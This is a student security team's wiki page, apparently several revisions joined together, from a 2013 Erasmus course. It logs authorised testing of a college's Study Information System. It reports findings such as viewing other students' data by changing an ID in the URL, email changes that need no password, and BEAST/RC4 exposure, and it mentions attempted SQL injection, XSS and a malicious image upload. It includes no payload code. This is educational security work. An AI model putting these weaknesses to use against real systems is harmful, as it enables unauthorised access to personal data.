* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===
* '''What I did like:'''
** Working in a team on a real-life problem.
** Practising problem-solving and working as a team.
** Learned a lot of new stuff.
** Organisation - well done
** Had a wonderful team!

* '''What I did not like:'''
** A couple of days short of time - as usual...

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:36:01Z

Saus: /* Feedback from Mika Salmela */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feedback==
===Feedback from Sten Aus===
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don't know the purpose yet, but you will find it out in the future.

I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.

I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling "competition" and it was fun!

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===
* '''What I did like:'''
** First of all, i would like thank you everyone!
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!

* '''What I did not like:'''
** Not so much free time T.T

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===
* '''What I did like:'''
** Working in teams.
** Meeting new people.
** Seeing new places.
** Learning new things.

* '''What I did not like:'''
** Too long studying/working days.
** Brainstorming after whole day of lectures.

Security

2013-04-05T08:35:50Z

Saus: /* Feedback from Jurij Lukjančikov */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
